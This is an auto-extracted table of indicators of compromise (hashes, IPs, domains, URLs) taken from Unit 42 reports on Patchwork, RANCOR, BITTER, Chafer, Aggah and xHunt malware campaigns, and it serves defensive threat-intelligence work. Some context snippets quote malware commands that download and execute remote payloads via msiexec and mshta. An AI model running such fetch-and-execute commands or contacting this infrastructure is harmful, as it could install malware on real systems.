Indicators of compromise
4,114 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| sha256 | 290ac98de80154705794e96d0c6d657c948b7dff7abf25ea817585e4c923adb2 | research blog, we are discussing the following file: SHA256 290ac98de80154705794e96d0c6d657c948b7dff7abf25ea817585e4c923adb2 MD5 79ad2084b057847ce2ec2e48fda64073 Compile Date 2017-12-2 | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | a67220bcf289af6a99a9760c05d197d09502c2119f62762f78523aa7cbc96ef1 | n be seen in the images below: Figure 1 Lure extracted from a67220bcf289af6a99a9760c05d197d09502c2119f62762f78523aa7cbc96ef1 Figure 2 Lure extracted from 07d5509988b1aa6f8d5203bc4b75e6 | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | ab4f86a3144642346a3a40e500ace71badc06a962758522ca13801b40e9e7f4a | 67e92b49169c24051ee9de41327ee5e6ac7c2 BADNEWS SHA256 Hashes ab4f86a3144642346a3a40e500ace71badc06a962758522ca13801b40e9e7f4a 290ac98de80154705794e96d0c6d657c948b7dff7abf25ea817585e4c92 | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | b8abf94017b159f8c1f0746dca24b4eeaf7e27d2ffa83ca053a87deb7560a571 | 6acf5055831cc961a51d3e921f96bd Figure 3 Lure extracted from b8abf94017b159f8c1f0746dca24b4eeaf7e27d2ffa83ca053a87deb7560a571 Figure 4 Lure extracted from d486ed118a425d902044fb7a84267e | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | d486ed118a425d902044fb7a84267e92b49169c24051ee9de41327ee5e6ac7c2 | 7e27d2ffa83ca053a87deb7560a571 Figure 4 Lure extracted from d486ed118a425d902044fb7a84267e92b49169c24051ee9de41327ee5e6ac7c2 and fd8394b2ff9cd00380dc2b5a870e15183f1dc3bd82ca6ee58f055b4 | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | fd8394b2ff9cd00380dc2b5a870e15183f1dc3bd82ca6ee58f055b44074c7fd4 | a425d902044fb7a84267e92b49169c24051ee9de41327ee5e6ac7c2 and fd8394b2ff9cd00380dc2b5a870e15183f1dc3bd82ca6ee58f055b44074c7fd4 The payload from each of the malicious documents is an upda | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · Aug 17, 2026 |
| url | http://feed43[ | rvers 185.203.118[.]115 94.156.35[.]204 Dead Drop Resolvers hxxp://feed43[.]com/8166706728852850.xml hxxp://feed43[.]com/3210021137734 | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · Aug 17, 2026 |
| url | http://feeds.rapidfeeds[ | 622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.]com/88604/ Script to Decrypt Dead Drop Resolvers 1 2 3 4 5 | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · Aug 17, 2026 |
| url | http://www.webrss[ | 66706728852850.xml hxxp://feed43[.]com/3210021137734622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.] | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | facebook-apps.com | t mimic popular technology companies. One of these domains, facebook-apps[.]com, was identified in one of the malware samples associated | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | jdanief.xyz | ject ( "WScript.Shell" ) . Run "msiexec /q /i http:\\dlj40s.jdanief[.]xyz/images/word3.doc" , 0 > % userProfile % \ AppData \ Local | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 199.247.6.253 | ct ( ^ "Wscript.Shell^" ) : v . Run ^ "msiexec /q /i http://199.247.6.253/ud^" , false , 0 < nul > C : \ Windows \ System32 \ spool \ | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 89.46.222.97 | 90fe195a2ef109d855 Loader C2 facebook-apps.com (resolves to 89.46.222.97) c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca47 | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| md5 | 6fa5bcedaf124cdaccfa5548eed7f4b0 | 4d92bc7d0 SHA1 25ba920cb440b4a1c127c8eb0fb23ee783c9e01a MD5 6fa5bcedaf124cdaccfa5548eed7f4b0 Compile Time 2018-03-14 07:20:11 UTC File Type PE32 executa | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| md5 | 7c65565dcf5b40bd8358472d032bc8fb | 32e38ae78 SHA1 ac3f20ddc2567af0b050c672ecd59dddab1fe55e MD5 7c65565dcf5b40bd8358472d032bc8fb Compile Time 2017-09-25 00:54:18 UTC File Type PE32 executa | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| md5 | a5164c686c405734b7362bc6b02488cb | f9c154ad7 SHA1 03defdda9397e7536cf39951246483a0339ccd35 MD5 a5164c686c405734b7362bc6b02488cb Compile Time 2018-03-28 01:54:40 UTC File Type PE32 executa | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| md5 | d5679158937ce288837efe62bc1d9693 | a473c505d SHA1 0bdb44255e9472d80ee0197d0bfad7d8eb4a18e9 MD5 d5679158937ce288837efe62bc1d9693 Compile Time 2018-04-02 07:57:38 UTC File Type PE32 executa | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| sha1 | 03defdda9397e7536cf39951246483a0339ccd35 | c9574cb24b78fb533f6e92d35bc6451770f9f6001487ff9c154ad7 SHA1 03defdda9397e7536cf39951246483a0339ccd35 MD5 a5164c686c405734b7362bc6b02488cb Compile Time 2018-03-2 | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| sha1 | 0bdb44255e9472d80ee0197d0bfad7d8eb4a18e9 | 6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d SHA1 0bdb44255e9472d80ee0197d0bfad7d8eb4a18e9 MD5 d5679158937ce288837efe62bc1d9693 Compile Time 2018-04-0 | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| sha1 | 25ba920cb440b4a1c127c8eb0fb23ee783c9e01a | 502907e1d036cdf76f62b0308b2676ebdfc3a51dbab614d92bc7d0 SHA1 25ba920cb440b4a1c127c8eb0fb23ee783c9e01a MD5 6fa5bcedaf124cdaccfa5548eed7f4b0 Compile Time 2018-03-1 | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| sha1 | ac3f20ddc2567af0b050c672ecd59dddab1fe55e | 947f0e86eed0c26c76805b13ca2d47ecbdb61fd07917732e38ae78 SHA1 ac3f20ddc2567af0b050c672ecd59dddab1fe55e MD5 7c65565dcf5b40bd8358472d032bc8fb Compile Time 2017-09-2 | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 0517b62233c9574cb24b78fb533f6e92d35bc6451770f9f6001487ff9c154ad7 | During runtime, the following plugin was identified: SHA256 0517b62233c9574cb24b78fb533f6e92d35bc6451770f9f6001487ff9c154ad7 SHA1 03defdda9397e7536cf39951246483a0339ccd35 MD5 a5164c686 | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855 | ted to this IP address: SHA256 Description Connection to IP 0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855 Loader C2 facebook-apps.com (resolves to 89.46.222.97) c356 | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 119572fafe502907e1d036cdf76f62b0308b2676ebdfc3a51dbab614d92bc7d0 | For the analysis below, we used the following file: SHA256 119572fafe502907e1d036cdf76f62b0308b2676ebdfc3a51dbab614d92bc7d0 SHA1 25ba920cb440b4a1c127c8eb0fb23ee783c9e01a MD5 6fa5bceda | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458 | o 2 / RU SYSTEM Cluster B Case 2: Delivery via HTA Loader - 1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458 In this case the attackers sent an HTML Application file (. | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31 | ,helloworld2,sqmAddTostream,DllEntryPoint microsoftfuckedup 6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31 The following actions are performed with the additional fun | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483 | w. Cluster A Case 1: Delivery via document property macro – a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483 In our research we found at least one attack against a comp | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | b099c31515947f0e86eed0c26c76805b13ca2d47ecbdb61fd07917732e38ae78 | or that sample. The retrieved plugin was as follows: SHA256 b099c31515947f0e86eed0c26c76805b13ca2d47ecbdb61fd07917732e38ae78 SHA1 ac3f20ddc2567af0b050c672ecd59dddab1fe55e MD5 7c65565dc | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e | es have additional unique differences: Hash Functions Mutex bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e helloworld helloworld1,helloworld2,sqmAddTostream,DllEntryP | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d | d855 Loader C2 facebook-apps.com (resolves to 89.46.222.97) c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d PLAINTEE Hosted on 89.46.222.97 Digging in further, the mal | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | bookreader.bit | use them. This new sample attempts to resolve two domains, bookreader[.]bit and doghunter[.]bit via the following hardcoded DNS Serve | Upatre Continued to Evolve with new Anti Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | doghunter.bit | ample attempts to resolve two domains, bookreader[.]bit and doghunter[.]bit via the following hardcoded DNS Servers: 31.3.135[.]232 1 | Upatre Continued to Evolve with new Anti Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 8ac7909730269d62efaf898d1a5e87251aadccf4349cd95564ad6a3634ba4ef4 | omise associated with this analysis include: Upatre SHA256: 8ac7909730269d62efaf898d1a5e87251aadccf4349cd95564ad6a3634ba4ef4 Cthonic SHA256: 94a8b4b22dab4171edde5b1bafbf2f17dbe3c3c4c01 | Upatre Continued to Evolve with new Anti Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 94a8b4b22dab4171edde5b1bafbf2f17dbe3c3c4c01335c36ba3b6e5d3635b83 | ample configured with the same dot-bit domains. The sample, 94a8b4b22dab4171edde5b1bafbf2f17dbe3c3c4c01335c36ba3b6e5d3635b83, was compiled six days after our Upatre sample and delivere | Upatre Continued to Evolve with new Anti Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | almasoodgroup.com | ry 2019, an engineering and hydraulics company in Pakistan, almasoodgroup[.]com was observed hosting two AtraDownloader executables as we | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | aroundtheworld123.net | nhexlify("6E7F7C827B71817572847C7F79713E3F403B7B7281"))) >> aroundtheworld123[.]net The malware proceeds to check to determine if the AVG sec | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com.pk | ich had the following names, were hosted on the URL khurram.com[.]pk/js/drvn and communicated with the domain nethosttalk[.]co | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | cyberthreatalliance.org | s. For more information on the Cyber Threat Alliance, visit cyberthreatalliance.org. Appendix ArtraDownloader Malware Analysis – Variant 1 For | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | frameworksupport.net | xFF) return out >> print(decode(“iudphzrunvxssruw1qhw”)) >> frameworksupport[.]net It proceeds to attempt to create the C:\intel\ directory, | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gov.pk | ember 17 and 18 2018, a file was downloaded from http://fst.gov[.]pk/images/winsvc (SHA256: ef0cb0a1…) after a user accessed t | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | khurram.com | bles, which had the following names, were hosted on the URL khurram.com[.]pk/js/drvn and communicated with the domain nethosttalk[. | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | kielsoservice.net | mmunicated with the domains info.viewworld71[.]com or hewle.kielsoservice[.]net. The RMMUN, Roots Metropolitan Model United Nations, is a | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | nethosttalk.com | n Saudi Arabia. The malicious file communicated with the C2 nethosttalk[.]com. Around the same timeframe, two additional files (listed | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | nsiagenthoster.net | om/js/cwqj and communicated with C2 domain thepandaservices.nsiagenthoster[.]net. The domain almasoodgroup[.]com appears to be a legitimat | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | org.pk | op.pdf[.]com Beginning on Nov 6, 2018, the URL http://rmmun.org[.]pk/svch was observed hosting two ArtraDownloader files that | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | pdf.com | the domain nethosttalk[.]com for C2. Handling of Logistics.pdf[.]com Cyber security work shop.pdf[.]com Beginning on Nov 6, 20 | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | viewworld71.com | traDownloader files that communicated with the domains info.viewworld71[.]com or hewle.kielsoservice[.]net. The RMMUN, Roots Metropolit | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | wforc.pk | ed files with the following names hosted on the URL https://wforc[.]pk/js/. Internet Data Traffic Report – August 2018.docx PAF | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | xiovo426.net | mpany’s domain communicated with command and control domain xiovo426[.]net. On 2 Jan 19, the file article_amy.doc was also uploaded | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | zmwardrobe.com | on malicious documents that were downloaded from the domain zmwardrobe[.]com and subsequently executed a payload referred to as MY24. | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| md5 | 7cc0b212d1b8ceb808c250495d83bae4 | remainder of the analysis, the following file is used: MD5 7cc0b212d1b8ceb808c250495d83bae4 SHA1 d2c161ce52240b61d632607a2262890327d82502 SHA256 ef0cb0 | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| md5 | 8d42c01180be7588a2a68ad96dd0cf85 | remainder of the analysis, the following file is used: MD5 8d42c01180be7588a2a68ad96dd0cf85 SHA1 89a7861acb7983ad712ae9206131c96454a1b3d8 SHA256 0b2a79 | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| md5 | a1bdb1889d960e424920e57366662a59 | remainder of the analysis, the following file is used: MD5 a1bdb1889d960e424920e57366662a59 SHA1 177837d0fa5bfd274abe79d80a01cfe2374b4cd9 SHA256 f0ef42 | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| sha1 | 177837d0fa5bfd274abe79d80a01cfe2374b4cd9 | ing file is used: MD5 a1bdb1889d960e424920e57366662a59 SHA1 177837d0fa5bfd274abe79d80a01cfe2374b4cd9 SHA256 f0ef4242cc6b8fa3728b61d2ce86ea934bd59f550de9167afbca | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| sha1 | 89a7861acb7983ad712ae9206131c96454a1b3d8 | ing file is used: MD5 8d42c01180be7588a2a68ad96dd0cf85 SHA1 89a7861acb7983ad712ae9206131c96454a1b3d8 SHA256 0b2a794bac4bf650b6ba537137504162520b67266449be979679 | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| sha1 | d2c161ce52240b61d632607a2262890327d82502 | ing file is used: MD5 7cc0b212d1b8ceb808c250495d83bae4 SHA1 d2c161ce52240b61d632607a2262890327d82502 SHA256 ef0cb0a1a29bcdf2b36622f72734aec8d38326fc8f7270f78bd9 | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 0b2a794bac4bf650b6ba537137504162520b67266449be979679afbb14e8e5c0 | d0cf85 SHA1 89a7861acb7983ad712ae9206131c96454a1b3d8 SHA256 0b2a794bac4bf650b6ba537137504162520b67266449be979679afbb14e8e5c0 Compile Timestamp 2019-01-07 07:13:47 UTC PDB String c:\Use | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | ef0cb0a1a29bcdf2b36622f72734aec8d38326fc8f7270f78bd956e706a5fd57 | 83bae4 SHA1 d2c161ce52240b61d632607a2262890327d82502 SHA256 ef0cb0a1a29bcdf2b36622f72734aec8d38326fc8f7270f78bd956e706a5fd57 Compile Timestamp 2018-12-06 11:14:45 UTC Table 1 ArtraDown | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | f0ef4242cc6b8fa3728b61d2ce86ea934bd59f550de9167afbca0b0aaa3b2c22 | 662a59 SHA1 177837d0fa5bfd274abe79d80a01cfe2374b4cd9 SHA256 f0ef4242cc6b8fa3728b61d2ce86ea934bd59f550de9167afbca0b0aaa3b2c22 Compile Timestamp 2018-07-30 09:18:37 UTC PDB String d:\C++ | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | eseses.tk | ri[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) ytb[.]services eseses[.]tk | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | turkiyeburslari.gov.tr | irrors the legitimate Turkish Scholarship government domain turkiyeburslari[.]gov[.]tr, also resolved to this IP and may likely have been used | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | turkiyeburslari.tk | ly associated with Chafer activity. Of interest, the domain turkiyeburslari[.]tk, which mirrors the legitimate Turkish Scholarship governm | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | win10-update.com | rted earlier in 2018 by Clearsky , specifically, the domain win10-update[.]com. While we lack visibility into the initial delivery mecha | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | win7-update.com | report win10-update[.]com 185.177.59[.]70 134.119.217[.]87 win7-update[.]com turkiyeburslari[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | xn--mgbfv9eh74d.com | ]70 134.119.217[.]87 win7-update[.]com turkiyeburslari[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) ytb[.]services eseses[.]tk | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ytb.services | m turkiyeburslari[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) ytb[.]services eseses[.]tk | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 0282b7705f13f9d9811b722f8d7ef8fef907bee2ef00bf8ec89df5e7d96d81ff | [.]com/update.php?req=<redacted>&m=d This payload, (SHA256: 0282b7705f13f9d9811b722f8d7ef8fef907bee2ef00bf8ec89df5e7d96d81ff), which we are tracking as MechaFlounder, was developed in | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1 | hows a VBScript run by an OilRig delivery document (SHA256: 1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1) on the left compared to a Chafer AutoIT script (SHA256: 33 | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 332fab21cb0f2f50774fccf94fc7ae905a21b37fe66010dcef6b71c140bb7fa1 | e1) on the left compared to a Chafer AutoIT script (SHA256: 332fab21cb0f2f50774fccf94fc7ae905a21b37fe66010dcef6b71c140bb7fa1) on the right, which have colored boxes surrounding code ov | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | bitly.com | the following URL via the "Shell" command: mshta hxxp://www.bitly[.]com/SmexEaldos3 The command above uses the built-in “mshta” a | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | blogspot.com | alysis, the shortened bit.ly URL redirected to hxxps://bjm9.blogspot[.]com/p/si.html , as seen in the “Location” field of the HTTP r | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | duckdns.org | ult in the final payload being RevengeRAT configured with a duckdns[.]org domain for C2. During our research, we found several rela | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | pastebin.com | ding of a portable executable hosted on Pastebin at https://pastebin[.]com/raw/2LDaeHE1 , decoding the base64 downloaded from the UR | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | vb.net | rom pastebin[.]com/raw/2LDaeHE1 This payload was written in VB.NET and named "Nuclear Explosion," which is a variant of Reveng | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | wixstatic.com | attempts to load a remote OLE document from hxxps://static.wixstatic[.]com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc : Figure | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f | ooter of Activity.doc file is actually an RTF file (SHA256: 5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f ) that loads an embedded Excel document with a heavily obfu | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | d7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946 | document attached with the filename “Activity.doc” (SHA256: d7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946 ) that attempted to load a remote OLE document via Template | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://bjm9.blogspot[ | WildFire's analysis, the shortened bit.ly URL redirected to hxxps://bjm9.blogspot[.]com/p/si.html , as seen in the “Location” field of the HTT | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://pastebin[ | n to download a script from a Pastebin URL, specifically at hxxps://pastebin[.]com/raw/tb5gHu2G that we will continue to refer to as the | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| url | https://static.wixstatic[ | t’s footer that attempts to load a remote OLE document from hxxps://static.wixstatic[.]com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc : Figu | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| url | http://www.bitly[ | nd execute the following URL via the "Shell" command: mshta hxxp://www.bitly[.]com/SmexEaldos3 The command above uses the built-in “mshta | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | 6google.com | 2019 Masked winx64-microsoft[.]com 7/15/18 - 7/15/19 Masked 6google[.]com 7/31/18 - 7/31/19 Masked alforatsystem[.]com 5/29/18 - 5/ | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | alforatsystem.com | /18 - 7/15/19 Masked 6google[.]com 7/31/18 - 7/31/19 Masked alforatsystem[.]com 5/29/18 - 5/29/19 Masked windows64x[.]com 8/18/18 - 8/18/ | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | check-updates.com | - 10/10/19 Masked pasta58[.]com 12/27/17 - 12/27/18 Masked check-updates[.]com 6/24/18 - 6/24/19 Sofia Weber locas.l[@]yahoo.com travele | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | firewallsupports.com | lation to pasta58[.]com : Domain Date Registered Registrant firewallsupports[.]com 5/6/2018 - 5/6/2019 Masked winx64-microsoft[.]com 7/15/18 | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | mail.contoso.com | ing, we were able to enable the C2 channel: hisoka;pass123!;mail.contoso.com;2010 To initiate communications, Hisoka notifies the actor | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | microsoft-check.com | 18/19 Masked windows-updates[.]com 1/10/18 - 1/10/19 Masked microsoft-check[.]com 10/10/18 - 10/10/19 Masked pasta58[.]com 12/27/17 - 12/27 | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | microsofte-update.com | ven Hisoka v0.8 samples configured to beacon to the domains microsofte-update[.]com . Each of these samples also contain the following debug | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | pasta58.com | a samples -- all of which were configured to use the domain pasta58[.]com for its C2 server. During general infrastructure analysis | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | sakabota.com | domain registration details, we also identified the domain sakabota[.]com whose web server served a page with the title “Outlook We | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | traveleasy-kw.com | tes[.]com 6/24/18 - 6/24/19 Sofia Weber locas.l[@]yahoo.com traveleasy-kw[.]com 6/13/18 - 6/13/19 Masked Table 1. Domains associated with | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
